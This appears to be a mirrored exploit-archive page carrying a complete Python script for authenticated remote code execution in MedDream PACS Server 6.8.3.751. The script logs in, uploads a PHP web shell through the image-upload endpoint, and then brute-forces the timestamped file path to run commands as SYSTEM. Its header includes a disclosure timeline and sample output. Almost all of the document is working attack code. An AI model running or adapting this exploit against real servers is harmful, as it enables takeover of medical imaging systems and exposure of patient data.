扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 |
#!/usr/bin/python # # # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated) # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated) # Date: 2020-10-01 # Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/ # Vendor Homepage: https://www.softneta.com # Version: 6.8.3.751 # Tested On: Windows 2016 # # # Timeline # 05-02-20: Submitted incident through email, immediate response # 05-04-20: Issue resolved, New version released 6.8.3.1.751 # # Note: Core Vulnerability resides in another product which has been remediated as well # ##PoC## # # 1. create one line php shell to call commands # 2. run script on attacking machine # 3. enter parameters; IP, filename, username, password, command # # # root@kali:~# python meddream.py # Enter IP Address: 192.168.0.223 # Enter payload filename + .php: cmd.php # Enter Username: user1 # Enter Password: SoSecure!! # Enter command: whoami # 212357 # <pre>nt authority\system # </pre> # http://192.168.0.223/Pacs/upload/20201001-212357--cmd.php?cmd=whoami # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # # from urllib2 import urlopen from bs4 import BeautifulSoup import requests import sys import time from datetime import datetime, timedelta ip_addr = raw_input("Enter IP Address: ") user_file = raw_input("Enter payload filename + .php: ") uname = raw_input("Enter Username: ") pword = raw_input("Enter Password: ") cmd = raw_input("Enter command: ") URL1= 'http://' + ip_addr + '/Pacs/login.php' URL2= 'http://' + ip_addr + '/Pacs/authenticate.php' URL3= 'http://' + ip_addr + '/Pacs/uploadImage.php' def main(): session = requests.Session() site = session.get(URL1) soup = BeautifulSoup(site.content, "html.parser") antispam = soup.find("input", {"name":"formAntiSpam"})["value"] dbname = soup.find("input", {"name":"aetitle"})["value"] login_data = { 'loginvalue': 'login', 'aetitle': dbname, 'username': uname, 'password': pword, 'formAntispam': antispam, 'login': 'Login', } r = session.post(URL2, data = login_data) files = [ ('actionvalue', (None, 'Attach', None)), ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')), ('action', (None, 'Attach', None)), ] r = session.post(URL3, files=files) today = datetime.today() upload_date = today.strftime("%Y%m%d") less = 1 now1 = datetime.now() up_time1 = now1.strftime("%H%M%S") print(up_time1) #varying time checks +/- now2 = now1 - timedelta(seconds=less) up_time2 = now2.strftime("%H%M%S") now3 = now2 - timedelta(seconds=less) up_time3 = now3.strftime("%H%M%S") now4 = now3 - timedelta(seconds=less) up_time4 = now4.strftime("%H%M%S") now5 = now4 - timedelta(seconds=less) up_time5 = now5.strftime("%H%M%S") now6 = now5 - timedelta(seconds=less) up_time6 = now6.strftime("%H%M%S") now7 = now6 - timedelta(seconds=less) up_time7 = now7.strftime("%H%M%S") now8 = now1 + timedelta(seconds=less) up_time8 = now8.strftime("%H%M%S") now9 = now8 + timedelta(seconds=less) up_time9 = now8.strftime("%H%M%S") now10 = now1 + timedelta(seconds=less) up_time10 = now9.strftime("%H%M%S") up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10] for i in up_time_array: r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd) if r.status_code == 200: print r.content print r.url else: print ("404") if __name__ == '__main__': main() |
体验盒子
